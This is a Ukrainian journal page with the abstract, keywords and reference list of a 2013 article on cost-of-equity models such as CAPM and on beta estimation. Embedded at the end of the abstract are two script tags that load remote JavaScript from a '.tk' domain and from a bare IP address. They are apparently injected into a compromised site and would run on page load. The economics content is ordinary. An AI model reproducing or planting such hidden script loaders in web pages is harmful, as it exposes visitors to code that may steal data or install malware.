ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.142
Сторінка молодого науковця

Теорія та практика застосування моделей визначення вартості акціонерного капіталу / Білич А. В. // Економіка АПК. - 2013. - № 5 - С. 116

Наведено аргументи на користь використання науково обґрунтованого підходу до визначення вартості акціонерного капіталу з метою подальшої оцінки вартості бізнесу. Розглянуто різні моделі визначення вартості акціонерного капіталу з аналізом основних їх складових елементів та наведенням поетапної процедури проведення такої оцінки. Особливу увагу приділено проблемним питанням, що стосуються визначення беззбиткової ставки дохідності й рівня систематичного ризику. На основі проведених розрахунків і одержаних результатів зроблено висновки щодо використання різних фондових індексів, що впливають на рівень систематичного ризику бізнесу та вартість його капіталу. Наведено аргументи щодо необхідності нормалізації одержаних результатів. Також розглянуто альтернативні концептуальні підходи до визначення вартості акціонерного капіталу. В результаті критичного аналізу наведено переваги та недоліки їх практичного застосування, відзначено високу значущість результатів, одержаних за допомогою моделі САРМ. Рис.: 3. Бібліогр.: 20.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: вартість бізнесу, структура капіталу, ставка дисконтування, беззбиткова ставка дохідності, коефіцієнт систематичного ризику, фондовий індекс, фінансовий леверидж

Список використаних джерел

 1. Андрійчук В.Г. Ефективність діяльності аграрних підприємств: теорія, методика, аналіз: монографія / В.Г. Андрійчук. – К.: КНЕУ, 2005. – 292 с.
 2. Дамодаран А. Инвестиционная оценка: инструменты и методы оценки любых активов / А. Дамодаран ; пер. с англ.; 4-е изд. – М.: Альпина Бизнес Букс, 2007. -1340 с.
 3. Кокинз Г. Управление результативностью. Как преодолеть разрыв между объявленной стратегией и реальними процесами / Г. Кокинз. – М.: Альпина, 2008. – 315 с.
 4. Колас Б. Управление финансовой деятельностью предприятия. Проблемы, концепции, методы: учеб. пособие / Б. Колас ; пер. с франц. под ред. проф. Я.В. Колосова. – М.: Финансы, ЮНИТИ, 1997. – 576 с.
 5. Коупленд Т. Стоимость компаний: оценка и управление / Т. Коупленд, Т. Коллер, Дж. Мурин ; пер. с англ. – 3-е изд., перераб. и доп. – М.: ЗАО «Олимп-Бизнес», 2007. – 576 с.
 6. Мендрул О.Г. Управління вартістю підприємств: монографія / О.Г. Мендрул. – К.: КНЕУ, 2002. – 272 с.
 7. Мочерный С.В. Экономическая теория: учеб. для вузов / С.В. Мочерный, В.Н. Некрасов и др. – М.: ЗАО «Книга-сервис», 2003. – 416 с.
 8. Огієр Т. Справжня вартість капіталу: Практичний посібник з прийняття фінансових рішень / Т. Огієр, Дж. Раг-ман, Л. Спайсер ; пер. з англ.; за наук. ред. О.Б. Ватченко. – Дніпропетровськ: Баланс Бізнес Букс, 2007. – 288 с.
 9. Островська Г. Управління вартістю: сучасні оцінки корпоративної ефективності / Г. Островська // Світ фінансів. – 2008. – № 3 (16). – С. 106-116.
 10. Турило А.М. Визначення відмінностей у сутності та оцінці категорій «економічний стан підприємства» і «фінансовий стан підприємства» / А.М. Турило // Актуальні проблеми економіки – 2010. – №7. – С. 164-169.
 11. Узст Т. Пособие но оценке бизнеса / Т. Узст, Д. Джонс ; пер. с англ. – М.: КВИНТО-КОНСАЛТИНГ, 2003. – С. 650.
 12. Blume M. Betas and the regression tendencies / M. Blume // Journal of Finance. 1975. – №30. – Р. 785-795.
 13. Blume M. On the assessment of risk / M. Blume // Journal of Finance. – 1971. – №26. – Р. 1-10.
 14. Bradfield D. On estimating the beta coefficient / D. Bradfield // Investment Analyst Journal. – 2003. – №57. – P.47-53.
 15. Corhay A. The The intervalling effect bias in beta: A note / A. Corhay // Journal of banking and finance. – 1992. – №16. – P. 61-73.
 16. Інтернет-ресурс: http://www.accaglobal.com/content/dam/acca/global/PDF.
 17. Інтернет-ресурс: http://www.wseinternational.eu/.
 18. Інтернет-ресурс: http://www.pfts.com/en/.
 19. Інтернет-ресурс: http://investfunds.ua/markets/indicators/WIG-Ukraine/.
 20. Інтернет-ресурс: http://www.ba.metu.edu.tr/~adil/ba4829/damodaran-beta.pdf.
Читати статтю: 13_05_19.pdf